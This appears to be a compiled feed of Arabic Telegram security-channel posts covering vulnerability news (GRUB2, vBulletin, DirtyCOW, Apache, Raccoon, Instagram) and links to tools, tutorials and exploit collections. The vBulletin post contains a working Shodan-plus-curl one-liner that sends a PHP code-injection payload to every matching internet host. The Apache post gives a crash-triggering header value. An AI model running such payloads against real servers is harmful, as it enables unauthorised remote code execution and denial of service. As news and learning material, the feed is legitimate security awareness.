⚠️ اكتشاف عدة ثغرات أمنية ببروتوكول GTP الخاص بشبكة المحمول والانترنت
لشبكات 2G/3G/4G/5G
تسمح بـ :
🔸 التجسس على بيانات المستخدمين
🔸 انتحال الشخصية
🔸تساعد في عمليات الاحتيال
🔸 هجمات DoS

التفاصيل :
https://thehackernews.com/2020/06/mobile-internet-hacking.html

⚙https://github.com/future-architect/vuls

اداة مفتوحة المصدر لأنظمة Linux/FreeBSD لفحص واكتشاف الثغرات الأمنية للبرامج المثبتة على النظام
تعتمد على عدة قواعد بيانات
NVD
JVN
OVAL
RHSA/ALAS/ELSA/FreeBSD-SA.


#tools #scanner #vulnerability #Linux #FreeBSD #open_source
#ProjectSigma

⚠️ اكتشاف ثغرة أمنية جديدة في GRUB2 bootloader
تسمح بتخطي ال secure boot كما يمكن استغلالها للحصول على تثبيت دائم للوصول إلى جهاز الضحية persistence
* مليارات الأجهزة حول العالم مصابة * والتي تستخدم توزيعات لينكس أو أنظمة ويندوز ( تعتمد على grub bootloader )

التفاصيل :
https://thehackernews.com/2020/07/grub2-bootloader-vulnerability.html


#grub #persistence #vulnerability #bypass #secure_boot

📂 كورسات متنوعة بحجم 36 غيغابايت ( أمن معلومات - شبكات - برمجة ...... )
منوعة بين فيديوهات وكتب

* الرابط :
https://mega.nz/folder/DFpzEJDT#awRHvUL19q1FDfR80xeXrw

#courses #security #networking #programming
#project_sigma

rpcbind pentesting / enumeration [ port 111 ]

مقال يشرح طرق الاستفادة من المنفذ 111 rpcbind في جمع المعلومات عن الهدف وربما تحميل ورفع الملفات في بعض الحالات وبعض الاستغلالات الأخرى ..

https://book.hacktricks.xyz/pentesting/pentesting-rpcbind

#rpcbind #enumeration #port_111
#project_sigma

⚠️ vbulletin 0-day RCE

ثغرة vbulletin القديمة تعود من جديد ..
تحدثنا سابقاً عن ثغرة RCE في سكربت المنتديات الشهير vbulletin
CVE-2019-16759
والتي تم اكتشافها العام الماضي ونشر استغلال لها من قبل باحث مجهول ..
قامت الشركة بإصدار ترقيعات لها بعد فترة ..
حالياً تمكن باحث من إيجاد طريقة جديدة لتخطي الترقيع الأمني للثغرة وتنفيذ أوامر على النظام

- التفاصيل :
https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html

- الاستغلال :
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

- أمر لإيجاد مواقع مصابة بالاعتماد على محرك البحث shodan :

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done; 

#vbulletin #RCE #webapp #poc #exploit #0day
#project_sigma

▫️ DirtyCOW

ثغرة [ قديمة ] في كيرنال نظام لينكس linux kernel
( privilege escalation )

Race Condition COW ( copy-on-write )

فيديو رائع يشرح مبدأ الثغرة بالتفصيل

https://www.youtube.com/watch?v=kEsshExn7aE

* الاستغلال موجود على exploit-db بعدة إصدارات *


#root #privilege_escalation #DirtyCOW #race_condition
#project_sigma

مجموعة من الاستغلالات تعتمد على نفس المبدأ ولكن باستراتيجيات مختلفة
وطرق مختلفة للاستفادة من الاستغلال

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

The Basics of Exploit Development:
1. Win32 Buffer Overflows
https://www.coalfire.com/The-Coalfire-Blog/January-2020/The-Basics-of-Exploit-Development-1

2. SEH Overflows
https://www.coalfire.com/The-Coalfire-Blog/March-2020/The-Basics-of-Exploit-Development-2-SEH-Overflows

3. Egg Hunters
https://www.coalfire.com/The-Coalfire-Blog/May-2020/The-Basics-of-Exploit-Development-3-Egg-Hunters

- Unpatched yet -

https://thehackernews.com/2020/08/google-drive-file-versions.html

⚠️ Apache http server multiple vulnerabilities

باحث من الفريق الأمني الخاص بغوغل يكشف 3 ثغرات أمنية في سيرفر أباتشي .. تتنوع بين Denial of Service
و memory corruption
و RCE محتمل
CVEs :

CVE-2020-9490
CVE-2020-11984
CVE-2020-11993

Proof-of-Concept :
قام الباحث مكتشف الثغرة بنشر كود إثبات يسبب memory corruption + crash لسيرفر apache مصاب ( والذي يحوي HTTP/2 module )

وذلك بإرسال http header محدد يضم قيمة معينة وهو

Cache-Digest: EA9BQQ==

" الملف في المنشور التالي "

https://thehackernews.com/2020/08/apache-webserver-security.html

#apache #DOS #http #poc #memory_corruption
#Project_Sigma

Apache DOS PoC

اضغط زر Enter ل 70 ثانية للحصول على صلاحيات روت على نظام لينكس :)

الثغرة قديمة من 2016

http://securityaffairs.co/wordpress/53494/breaking-news/cve-2016-4484-linux.html

⚠️ Raccoon attack ..
ثغرة أمنية جديدة تمكن من كسر تشفير SSL/TLS وقراءة بيانات حساسة
( الثغرة server-side وليست client-side )

التفاصيل
https://thehackernews.com/2020/09/raccoon-ssl-tls-encryption.html

#SSL #TLS #side_channel #Raccoon
#Project_Sigma

#bugbounty
#2

IDOR
site : a-ads.com
author : Khalil Abbas

🔹 هل يمكنك إيجاد تفسير لما حدث في الفيديو ؟

سأشرح ما حدث في الفيديو بعد عدة أيام .. لأترك لكم مجال كافي للتفكير ..
إن تمكنت من إيجاد تفسير أرسله لنا على بوت التواصل
@ProjectSigmaTeam_bot

#ProjectSigmaTeam

⚠️⚠️⚠️ ثغرة أمنية خطيرة في تطبيق instagram النسخة الخاصة بنظام اندرويد تسمح بتحكم كامل بجهاز الضحية والسيطرة على الحساب !

Buffer overflow RCE

يمكن باستغلالها تنفيذ اوامر بجميع صلاحيات تطبيق انستاغرام والوصول طبعاً لملفات التطبيق وبياناته الخاصة وبالتالي الوصول للحساب او التجسس عليه

لا يوجد كود استغلال جاهز متاح حتى الآن ولكن تم نشر تفاصيل تقنية عن الثغرة أعتقد كافية لتطوير استغلال ..

https://thehackernews.com/2020/09/instagram-android-hack.html?m=1


#instagram #buffer_overflow #RCE
#ProjectSigmaTeam

⚠️ تسريب السورس كود الخاص بنظام windows xp و windows server 2003 !

التفاصيل :
https://thehackernews.com/2020/09/windows-xp-source-code.html

#source_code #leaks #windows #windows_xp
#ProjectSigmaTeam

قناة تهتم في الامن السيبراني واختبار الاختراق وعدة مواضيع اخرى مثل الاخبار التقنية ...

http://t.me/CyberSecurityIQ

مجموعة من ادوات Red Teaming

https://github.com/infosecn1nja/Red-Teaming-Toolkit

#Tool

Web Security Academy

منصة لتعلم اغلب ثغرات الويب ونقاط الضعف فيها مع الامثلة وبعض الاختبارات مقدمة من PortSwigger

الرابط : اضغط هنا